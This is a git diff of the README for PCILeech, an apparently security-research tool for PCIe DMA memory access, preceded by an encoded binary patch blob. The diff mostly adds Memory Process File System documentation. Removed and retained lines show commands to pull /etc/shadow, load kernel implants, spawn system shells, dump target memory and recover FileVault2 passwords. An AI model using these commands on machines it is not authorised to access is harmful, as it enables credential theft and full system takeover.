zT#YP3Ujq&z(t5$wb<PA_1NyFIHQmVmzYygCL<)NlJncHx`>k9Tz$X!zP$kz>p&OY{
zWI7AH>Sjlef?q}CZ2utmJR%Pqc7X4xz8@U_1;-u+6G$s@TET+&3NAK~0`SYKH-iUN
z7qo7n>xkn8=Oa?lHQ*lA1-GnZ4`7mZgSibXFUb=;_(ew-oPL{=wj5l5NW<b)C^u=q
za&UhmT|{ER+&i3>6@br)j(r<A=}t1b$!kJj_%2$3E;w@)n~Uh+<H$PnbztG$tQPbl
z@Bvm_1NwuYbr0hofy}yxy&91kMZgvJqGN9b7p!Iy(XuM=ZPf?C7aw3N#oh<r{t)Ah
z-Uz<+b>;~AAb3@avvi~2YpM@`??3D`Ed4OGkS})1_?3XqB%E>G3|`pEWtWU<z)w^^
z2=4rrv*8HtT*t(u(t;O$8_s664P5i2GwB3>h)Dju;K!;T1iLn{$HYn8jWTZ|1*6Xg
z|Me3JKsPTC36bZ3E{7`H(P~j2t;a5SH&Ts0;pdjg`-M|*0XX}Y&PoY`PpF;*&);R4
zeZ-G|@!#>E>;Zehmfemn7<|deXy9cc_0s|pY<`8+@v3950{0?&unR`_IB5l+{<US&
z3||L$>~Ea-VX*KuCr%akQ-p~eH+?AI9dKrE4|w5kompA~E`Oc%%Tg5l_;+L^*MhyA
z2N9`s8yJ1V*<=KNj7UXyg7Z@BrVQVF@E%0$Yrr&OZ_nVL{}^}9di(!KcfCmukRS|Z
z{fT9R?gb|yvgAVGJk=M1t5g^Kw(1?=q<zl(2!YEH*?bzoeQ%+Yr{L_joeG8HDC-cZ
zQ9oGpjur-9pn3#+Nc9$Q#UQTxUtlW*zkx{Q_>`ad1S!IP5WM!!P609SaYW*@fqy_2
z5+?=5-$UvlO(>WB#p%Z7U^_A&`yj|STucQzA3ibHBa#sxLy>Q}*t+1)5$Rq&nqro{
z@8}PL&mpa(-3ESu$TNlm;Nr9srzXw%e+D9%ZU(1(-~^O`@ejFDk+>N=_HS&-=wa}D
zM3z$od<>DaDR9mKrx(Lu1QEMnOm)G)Kb-wv@KR*Qa`ykFDCd5}I;Ma{;CjTKT;Rv5
z9|SKPa_lwW4n)RPu;OE#nBcU3I{B1=UqK`eU%4?aAZha737+!_J-w2$z=z`eCtcS9
zo^g;GuAr;I=MlRAFy~VzP7yeSR1in7@?VZ!aN1{dHTE)avf*pDbae>49BIVP7jVov
zL>eaeXVv5TQI6)jxZ8*{3%mr8uB!!;Svbv5>ke=ho_aea4p@cA5C}er%!+Y?0ltO!
z(Fehqcm(YuemQt862V>%o`Bo(9_*E1Z4Q5#CX)iioQEU$UIHTEc0_9011`dEPjtce
z5a|^@^kb&u8739wV?XBesxJb+gh-Dzf!|SmLcYh`G16oDsl+Pq9DHqepf4H~r>3Jl
zrVUaK#>RN;4M*_lLXX*xy#su=2tO?J{orgqDBpk{1}{dW5;5>J{>DoxS_R&L$YFIA
zI2GqYxhl>A??e39cY)u-lXz#G9jymt$s~`x&)0xyq?|~CS5NkE&F9Y_L0^bUe38Q{
z_!C45+X?QP>M<RXDfr4X{GrhIfax+v7hE=jhDknPWF}sJ=z{U%jwVw`1z35E#}qI#
z1w*r(t`@uiv6mCri^%L1e0eq%MehecJ(l@`Zo=quJ*HXo<2|@KG8xfJz%NzO!{|+d
zcq#U*Wd9c>cb-$&1n^iy3JZe=kU<joPw|-1r_v(yBCu=$-N<!8u>UkTx?rM;eCW|6
zIDl-!F8KZ#PX1}|<}+Cd9AsjkSr~T`n1vqm=2_I51pB~mevUbT&Ih8*3y4%`C%C$r
z)?i-)9&@h8)T7S=*CTRf>;a!&<jkQR;4>F6%bARu!N(#L$Yf7~gNRI0Z~Q`!IRz0?
z3;qR>7No%{93pE;Aovkdk3M0E$NUbFJ04R*Z{cQHggp$ti^#g)4_<w-Q|UVJ3zvAz
zTI?}!FCr^WaBeN*FUzR{W&Wjf3ju<Exs1t$zUp$1`EaRIp$S)bc=PEbUImt2=@cNi
z7THUD!GnlQOz&0nA|j39yIqEFb~(KW)<zvW7&lJ~p%UF-8j-|;WmnT(%yz*WkQ(&m
z;J1(v`VR1-Iwl}`EjamFb~^MBxEPTks{vC;D|W$Ku5(sU1Na=WPR{?^P)6OzG9pp{
zY)5vWcYxR5<P1$c`0CwENbGyS<Ks>N72r1z8NP0Cb`xt|9!h{C?_ouu2f(LR(@Qk0
z4eY#+KTyTq4c-#}GPQ;@fLZsG5gUsaJW+JE*h+Bb11ve>l!Nym^3-Du_&6f1TnBcl
zz5^_H(5aB%qoR|i+c#8vMsIqE&5eBGqAW-Jw=+S&jK`_q{Vi-PL=tR6cA*R2_OLTd
zjo{cvXfbI+;P()5WZ+A~=4C`GHwX?s%Aez67o4)zv6q4EYZ-qT?_Nj>k!}>6^$kZC
zT%~%|W9<KrdrUPM?FZjn$N0%{3cTV8kMqD1d>pAE4j(l(I}oXa;K(PPJnO)Jt|vZm
z0#7k!p{JM>kSO@!Mp}%10Q^!r69>Hsd<)ryJ_xRV+L^Fz;4eE^5!m^rvWY&!{6H6M
zLS*;^$3Dxdz+M8LhDhbAz_UB)xi}YwYLwd$sc9ql4McjP6)eK})!)dj2Of`zy#hQ7
zk@(%<r%0GM;VzF^(M<v9G4P+N^QmYv2B~Gwke`5)za)xrr4@|J->MW5ASi!8BLRZ)
zM=_!c%HO_-F32CE*t($n>BxSzQu|LxwmNqCQxW+)3yCkt-&okXp!{Kk*ahW}642we
zB7cz}0fOQ*F1nz&n~N?efAJu?AkOc$E{N~CtqY1LxWo~}>)X}^#nD^rg5tt2y5RlK
z9pw;wv~7RnrOa^gOU~Zr*v0=i?C9ICp6Z)!#rYtheHNB8u;_B;6_hK5pd8BOuqB5t
zIhx2(h3^yE`=9KCe9O?j0!UmDIR(lIQO?nF)|N+F@+eErM{@a-gT1ULna<3z?eS&4
zUs&EW&N=e?e}&tlb-wjhyqEow_j64fnm4p==-$w?p?5>yhW-tM8`2wwHY7XxJIpht
zJInT{4|i5|R(IBRMmuAjjh)S%EuG2Ej?SLW-p>BcfzH9sbf?+k-%_$Av?aWya!d7=
z$d>4q`YnxHnzpoTY2DJXrF%>7mcA_mTTE}3{d4f)O_iJCRhz0eMK;xLYT4YnIk~xG
zbNA++&AprZHurBH*qqutxH-LfXtU|`cLq93Izyf1o#D<(yBZO@BK3Avn(WH7+STc{
zE7WIKDP>n`$gWnvu2{KUwJN)EwNkzKmY7|`X1k6_yOuq6J^QI?YRll3^p>G5rpw<I
z=ql+7b(MF8yDGb?x~jV(UA0}&uKKQ6S7TRGS94cOS8G?YtE0=LviQ48UT@Narp@0L
zXe((8wUxJp+bY|t+ahhXZPB*+wpd$ZTT@$WTfC#KyRE0Kx2><Os=c~B(q7vhZLe>S
zwKujmwKuo7w70e=+dJC3+k4u3+xy!4+Xvd4HaBnn|JGaaL*4aX=&b*%zG8BvvkcA$
zrhJo(c-5xXO&yzhHuY^9*fh8)G4=-E>Kp>Od9e~t+~9lmr0R{e8|ybVZfxGzy0K$p
z&&Ixu0~-f74sG<em$a9+SJF$h^iU(c(@M|u&?^J&gY83!+v|Oo=aEx@(>eXWecz4z
z_176K3`%!bZ&!a;sw>?^aEMzb0GHKdC>c&xB_qjbGL~#gwj`6u?qqMWKbcCVlV*Kj
zeQ14nebxFz<VN4pVp3GG?E?ePq@NkWg@E5WOdPY^Hz{jFb9*9vov&znbh)q9`tQtJ
B5=H<3

diff --git a/readme.md b/readme.md
index 947aa81..68ce99d 100644
--- a/readme.md
+++ b/readme.md
@@ -6,6 +6,12 @@ PCILeech supports multiple hardware. USB3380 based hardware is only able to read
 
 PCILeech is capable of inserting a wide range of kernel implants into the targeted kernels - allowing for easy access to live ram and the file system via a "mounted drive". It is also possible to remove the logon password requirement, loading unsigned drivers, executing code and spawn system shells. PCIleech runs on Windows/Linux/Android. Supported target systems are currently the x64 versions of: UEFI, Linux, FreeBSD, macOS and Windows.
 
+PCILeech also supports the Memory Process File System - which can be used with PCILeech FPGA hardware devices in read-write mode or with memory dump files in read-only mode.
+
+To get going clone the repository and find the required binaries, modules and configuration files in the pcileech_files folder.
+
+For use cases and more detailed information check out this readme and the [project wiki pages](https://github.com/ufrisk/pcileech/wiki/).
+
 <img src="https://gist.githubusercontent.com/ufrisk/c5ba7b360335a13bbac2515e5e7bb9d7/raw/2df37be67047e19ea2c3f73be67a0ba06fea203d/_gh_mbp.jpg" height="150"/><img src="https://gist.githubusercontent.com/ufrisk/c5ba7b360335a13bbac2515e5e7bb9d7/raw/2df37be67047e19ea2c3f73be67a0ba06fea203d/_gh_m2.jpg" height="150"/><img src="https://gist.githubusercontent.com/ufrisk/c5ba7b360335a13bbac2515e5e7bb9d7/raw/2df37be67047e19ea2c3f73be67a0ba06fea203d/_gh_shadow.jpg" height="150"/><img src="https://gist.githubusercontent.com/ufrisk/c5ba7b360335a13bbac2515e5e7bb9d7/raw/314e527e13e78edd44cc6db2b7c05cfa4a1ce322/_gh_android.jpg" height="150"/><img src="https://gist.githubusercontent.com/ufrisk/c5ba7b360335a13bbac2515e5e7bb9d7/raw/2df37be67047e19ea2c3f73be67a0ba06fea203d/_gh_dump.gif" height="150"/><img src="https://gist.githubusercontent.com/ufrisk/c5ba7b360335a13bbac2515e5e7bb9d7/raw/ab5032dac2600acf1480d81ac265b66fecaaa9b2/_gh_ac701_pcileech_main.jpg" height="150"/><img src="https://gist.github.com/ufrisk/c5ba7b360335a13bbac2515e5e7bb9d7/raw/ab5032dac2600acf1480d81ac265b66fecaaa9b2/_gh_pciescreamer_pcileech_main.jpg" height="150"/>
 
 Capabilities:
@@ -18,6 +24,7 @@ Capabilities:
 * Raw PCIe TLP access (FPGA hardware).
 * Mount live RAM as file [Linux, Windows, macOS*].
 * Mount file system as drive [Linux, Windows, macOS*].
+* Mount memory process file system as driver [Windows].
 * Execute kernel code on the target system.
 * Spawn system shell [Windows].
 * Spawn any executable [Windows].
@@ -32,7 +39,7 @@ Capabilities:
 
 Hardware:
 =================
-PCILeech supports multiple hardware devices. Please check out the [PCILeech FPGA project](https://github.com/ufrisk/pcileech-fpga/) for information about supported FPGA based hardware. Please check out [PCILeech USB3380](usb3380.md) for information about USB3380 based hardware. 
+PCILeech supports multiple hardware devices. Please check out the [PCILeech FPGA project](https://github.com/ufrisk/pcileech-fpga/) for information about supported FPGA based hardware. Please check out [PCILeech USB3380](usb3380.md) for information about USB3380 based hardware. PCILeech also support memory dump files for limited functionality.
 
 Please find a device comparision table below.
 
@@ -77,30 +84,14 @@ Separate instructions for [Android](Android.md).
 Examples:
 =========
 
+Please see the [project wiki pages](https://github.com/ufrisk/pcileech/wiki/) for more examples. The wiki is in a buildup phase and information may still be missing.
+
 Mount target system live RAM and file system, requires that a KMD is loaded. In this example 0x11abc000 is used.
 * ` pcileech.exe mount -kmd 0x11abc000 `
 
-Mount Linux target system live RAM and file system without pre-loading a KMD.
-* ` pcileech.exe mount -kmd LINUX_X64_46 `
-
-Retrieve the file /etc/shadow from a Linux system without pre-loading a KMD.
-* ` pcileech.exe lx64_filepull -kmd LINUX_X64_46 -s /etc/shadow -out c:\temp\shadow `
-
-Show help for the lx64_filepull kernel implant.
+Show help for a specific kernel implant, in this case lx64_filepull kernel implant.
 * ` pcileech.exe lx64_filepull -help `
 
-Load a kernel module into Windows Vista by using the default memory scan technique.
-* ` pcileech.exe kmdload -kmd winvistax64 `
-
-Load a kernel module into Windows 10 by targeting the page table of the ntfs.sys driver signed on 2016-03-29.
-* ` pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt `
-
-Load a kernel module into Windows 10. Compatible with VBS/VTL0 only if "Protection of Code Integrity" is not enabled.
-* ` pcileech.exe kmdload -kmd WIN10_X64 `
-
-Spawn a system shell on the target system (system needs to be locked and kernel module must be loaded). In this example the kernel module is loaded at address: 0x7fffe000.
-* ` pcileech.exe wx64_pscmd -kmd 0x7fffe000 `
-
 Show help for the dump command.
 * ` pcileech.exe dump -help `
 
@@ -110,18 +101,9 @@ Dump all memory from the target system given that a kernel module is loaded at a
 Force dump memory below 4GB including accessible memory mapped devices using more stable USB2 approach.
 * ` pcileech.exe dump -force -usb2 `
 
-Exploit a vulnerable mac to retrieve the FileVault2 password. (USB3380 only).
-* ` pcileech.exe mac_fvrecover `
-
 Receive PCIe TLPs (Transaction Layer Packets) and print them on screen (correctly configured FPGA dev board required).
 * ` pcileech.exe tlp -vv -wait 1000 `
 
-Load a "kernel" module by searching for and hooking UEFI BootServices.SignalEvent(), execute sample print to screen shellcode and then unload "kernel" module.
-* ` pcileech.exe uefi_textout -kmd UEFI_SIGNAL_EVENT ` 
-
-Load a "kernel" module by hooking and BootServices.ExitBootServices(). Base memory location of UEFI specified manually (IBI SYST table).
-* ` pcileech.exe kmdload -kmd UEFI_EXIT_BOOT_SERVICES -efibase 0x7b399018 ` 
-
 Probe/Enumerate the memory of the target system for readable memory pages and maximum memory. (FPGA hardware only).
 * ` pcileech.exe probe ` 
 
@@ -131,6 +113,9 @@ Dump all memory between addresses min and max, don't stop on failed pages. Nativ
 Force the usage of a specific device (instead of default auto detecting it). The sp605_tcp device is not auto detected.
 * ` pcileech.exe pagedisplay -min 0x1000 -device sp605_tcp -device-addr 192.168.1.2 `
 
+Mount the PCILeech Memory Process File System from a Windows 10 64-bit memory image.
+* `pcileech.exe mount -device c:\temp\memdump_win10.raw`
+
 Generating Signatures:
 ======================
 PCILeech comes with built in signatures for Windows, Linux, FreeBSD and macOS. For Windows 10 it is also possible to use the pcileech_gensig.exe program to generate alternative signatures.
@@ -143,14 +128,14 @@ Limitations/Known Issues:
 * Some Linux kernels does not work. Sometimes a required symbol is not exported in the kernel and PCILeech fails.
 * Linux based on the 4.8 kernel and later might not work with the USB3380 hardware. As an alternative, if target root access exists, compile and insert .ko (pcileech_kmd/linux). If the system is EFI booted an alternative signature exists.
 * Windows 7: signatures are not published.
-* The Linux/Android versions of PCILeech dumps memory slightly slower than the Windows version. Mount target file system and live RAM are also not availabe in the Linux/Android versions.
-* FPGA support only exists for Windows. Linux and Android support is planned for the future.
+* The Linux/Android versions of PCILeech dumps memory slightly slower than the Windows version (USB3380 hardware). Mount target file system, process file system and live RAM are also not availabe in the Linux/Android versions.
+* FPGA and file system mount support only exists for Windows. Linux and Android support is planned for the future.
 
 Building:
 =========
 The binaries are found in the pcileech_files folder. If one wish to build an own version it is possible to do so. Compile the pcileech and pcileech_gensig projects from within Visual Studio. Tested with Visual Studio 2015. 
 
-To compile kernel- and shellcode, located in the pcileech_shellcode project, please look into the individual files for instructions. These files are usually compiled command line. To compile for Linux make sure the dependencies are met my running: `apt-get install libusb-1.0-0-dev pkg-config` then move into the pcileech/pcileech directory and build by running: `make`. Copy the pcileech binary to pcileech/pcileech_files afterwards.
+To compile kernel- and shellcode, located in the pcileech_shellcode project, please look into the individual files for instructions. These files are usually compiled command line. To compile for Linux make sure the dependencies are met my running: `apt-get install libusb-1.0-0-dev pkg-config` then move into the pcileech/pcileech directory and build by running: `make`. Download the shellcode module and configuration files separately from the binary download link and put them alongside the pcileech executable.
 
 Separate instructions for [Android](Android.md).
 
@@ -166,38 +151,16 @@ v1.0
 * Initial release.
 
 v1.1-v1.5
-* various updates. please see individual relases for more information.
-
-v2.0
-* mount target system live RAM and file system as drive.
-* substantial refactorings to support future multiple hardware devices.
-* signature: Linux 4.10 kernel support in LINUX_X64_EFI signature.
-
-v2.1
-* Linux support.
-* Android support.
-
-v2.2
-* UEFI support.
-* Linux 2.6.33-4.6 target support.
-* signature: Windows 10 updates to pcileech_gensig.exe
-
-v2.3
-* [FPGA hardware support (SP605/FT601)](https://github.com/ufrisk/pcileech-fpga).
-* Various changes.
-
-v2.4
-* Support for FPGA SP605/TCP added by [Dmytro Oleksiuk](https://github.com/Cr4sh).
-* Signature updates for various Windows versions including "fall creators update".
-* Linux file system mount support for kernel version 4.11 later.
-* Improved memory reading algorithm for FPGA devices.
-* Various bug fixes.
-
-v2.5
-* SP605/FT601: re-designed and improved. NB! FPGA device have to be re-flashed with new bitstream!
-* SP605/TCP: bug fixes.
-
-v2.6
-* FPGA: Support for PCIeScreamer and AC701/FT601 devices added.
-* Display command added.
+* Various updates. please see individual relases for more information.
+
+v2.0-2.6
+* Mount as a drive functionality.
+* Linux and Android support.
+* UEFI target support.
+* FPGA hardware support.
+* Various other updates. please see individual relases for more information.
+
+v3.0
+* PCILeech Memory Process File System.
+* Internal refactorings.
 * Various bug fixes.